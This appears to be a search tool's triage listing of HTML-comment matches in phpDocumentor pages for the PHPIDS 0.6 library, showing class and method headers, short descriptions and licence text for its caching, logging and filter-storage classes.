7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:23 (156/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:72 (157/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:83 (158/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:5 (159/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Filter_Storage_Abstract</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:25 (160/257) OK | Dubious | Bad | Hide
22-						
23-					</div>
24-	<div class="info-box-body">
25:        		<!-- ========== Info from phpDoc block ========= -->
26-<p class="short-description">Abstract Filter Storage</p>
27-<p class="description"><p>Class to assure the systems API</p></p>
28-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:147 (161/257) OK | Dubious | Bad | Hide
144-							
145-					</div>
146-		<div class="info-box-body">
147:			<a name="var$caching" id="$caching"><!-- --></A>
148-<div class="evenrow">
149-
150-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:158 (162/257) OK | Dubious | Bad | Hide
155-		</span>
156-	</div>
157-
158:	<!-- ========== Info from phpDoc block ========= -->
159-	<ul class="tags">
160-				<li><span class="field">access:</span> protected</li>
161-			</ul>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:168 (163/257) OK | Dubious | Bad | Hide
165-		
166-
167-</div>
168:<a name="var$filterPath" id="$filterPath"><!-- --></A>
169-<div class="oddrow">
170-
171-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:179 (164/257) OK | Dubious | Bad | Hide
176-		</span>
177-	</div>
178-
179:	<!-- ========== Info from phpDoc block ========= -->
180-	<ul class="tags">
181-				<li><span class="field">access:</span> protected</li>
182-			</ul>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:206 (165/257) OK | Dubious | Bad | Hide
203-		<div class="info-box-body">
204-			<A NAME='method_detail'></A>
205-
206:<a name="method__construct" id="__construct"><!-- --></a>
207-<div class="evenrow">
208-	
209-	<div class="method-header">
210-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">44</span>)
211-	</div> 
212-	
213:	<!-- ========== Info from phpDoc block ========= -->
214-<p class="short-description">Constructor</p>
215-	<ul class="tags">
216-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:235 (166/257) OK | Dubious | Bad | Hide
232-		
233-			
234-	</div>
235:<a name="methodaddFilter" id="addFilter"><!-- --></a>
236-<div class="oddrow">
237-	
238-	<div class="method-header">
239-		<span class="method-title">addFilter</span> (line <span class="line-number">96</span>)
240-	</div> 
241-	
242:	<!-- ========== Info from phpDoc block ========= -->
243-<p class="short-description">Adds one particular filter</p>
244-	<ul class="tags">
245-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:264 (167/257) OK | Dubious | Bad | Hide
261-		
262-			
263-	</div>
264:<a name="methodgetFilterSet" id="getFilterSet"><!-- --></a>
265-<div class="evenrow">
266-	
267-	<div class="method-header">
268-		<span class="method-title">getFilterSet</span> (line <span class="line-number">85</span>)
269-	</div> 
270-	
271:	<!-- ========== Info from phpDoc block ========= -->
272-<p class="short-description">Returns array containing all filters</p>
273-	<ul class="tags">
274-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:288 (168/257) OK | Dubious | Bad | Hide
285-		
286-			
287-	</div>
288:<a name="methodsetFilterSet" id="setFilterSet"><!-- --></a>
289-<div class="oddrow">
290-	
291-	<div class="method-header">
292-		<span class="method-title">setFilterSet</span> (line <span class="line-number">71</span>)
293-	</div> 
294-	
295:	<!-- ========== Info from phpDoc block ========= -->
296-<p class="short-description">Sets filter array manually</p>
297-	<ul class="tags">
298-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:5 (169/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Composite.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:23 (170/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:72 (171/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:83 (172/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:5 (173/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Memcached.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:23 (174/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:72 (175/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:83 (176/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:5 (177/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Session.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:23 (178/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:72 (179/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:83 (180/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Filter.php.html:5 (181/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Filter.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Filter.php.html:22 (182/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS  Requirements: PHP5, SimpleXML</p>
24-<p class="description"><p>Copyright (c) 2007 PHPIDS group (http://php-ids.org)</p><p>This program is free software; you can redistribute it and/or modify  it under the terms of the GNU General Public License as published by  the Free Software Foundation; version 2 of the license.</p><p>This program is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the  GNU General Public License for more details.</p></p>
25-
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Interface.php.html:5 (183/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Interface.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Interface.php.html:22 (184/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:5 (185/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_File</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:28 (186/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via a static flatfile.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:99 (187/257) OK | Dubious | Bad | Hide
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="oddrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">113</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:133 (188/257) OK | Dubious | Bad | Hide
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="evenrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">91</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-	<ul class="tags">
143-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:165 (189/257) OK | Dubious | Bad | Hide
162-		
163-			
164-	</div>
165:<a name="methodgetCache" id="getCache"><!-- --></a>
166-<div class="oddrow">
167-	
168-	<div class="method-header">
169-		<span class="method-title">getCache</span> (line <span class="line-number">163</span>)
170-	</div> 
171-	
172:	<!-- ========== Info from phpDoc block ========= -->
173-<p class="short-description">Returns the cached data</p>
174-<p class="description"><p>Note that this method returns false if either type or file cache is  not set</p></p>
175-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:197 (190/257) OK | Dubious | Bad | Hide
194-					</dl>
195-			
196-	</div>
197:<a name="methodsetCache" id="setCache"><!-- --></a>
198-<div class="evenrow">
199-	
200-	<div class="method-header">
201-		<span class="method-title">setCache</span> (line <span class="line-number">130</span>)
202-	</div> 
203-	
204:	<!-- ========== Info from phpDoc block ========= -->
205-<p class="short-description">Writes cache data into the file</p>
206-	<ul class="tags">
207-				<li><span class="field">throws:</span> Exception if cache file couldn't be created</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Interface.php.html:5 (191/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Interface.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Interface.php.html:22 (192/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:5 (193/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Memcached</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:28 (194/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via memcached.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:99 (195/257) OK | Dubious | Bad | Hide
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="oddrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">124</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:133 (196/257) OK | Dubious | Bad | Hide
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="evenrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">100</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-	<ul class="tags">
143-				<li><span class="field">throws:</span> Exception if necessary files aren't writeable</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:166 (197/257) OK | Dubious | Bad | Hide
163-		
164-			
165-	</div>
166:<a name="methodgetCache" id="getCache"><!-- --></a>
167-<div class="oddrow">
168-	
169-	<div class="method-header">
170-		<span class="method-title">getCache</span> (line <span class="line-number">172</span>)
171-	</div> 
172-	
173:	<!-- ========== Info from phpDoc block ========= -->
174-<p class="short-description">Returns the cached data</p>
175-<p class="description"><p>Note that this method returns false if either type or file cache is  not set</p></p>
176-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:198 (198/257) OK | Dubious | Bad | Hide
195-					</dl>
196-			
197-	</div>
198:<a name="methodsetCache" id="setCache"><!-- --></a>
199-<div class="evenrow">
200-	
201-	<div class="method-header">
202-		<span class="method-title">setCache</span> (line <span class="line-number">142</span>)
203-	</div> 
204-	
205:	<!-- ========== Info from phpDoc block ========= -->
206-<p class="short-description">Writes cache data</p>
207-	<ul class="tags">
208-				<li><span class="field">throws:</span> Exception if necessary files aren't writeable</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Init.php.html:5 (199/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Init.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Init.php.html:22 (200/257) OK | Dubious | Bad | Hide
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:5 (201/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Session</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:28 (202/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via session.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:99 (203/257) OK | Dubious | Bad | Hide
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="oddrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">98</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:133 (204/257) OK | Dubious | Bad | Hide
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="evenrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">84</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
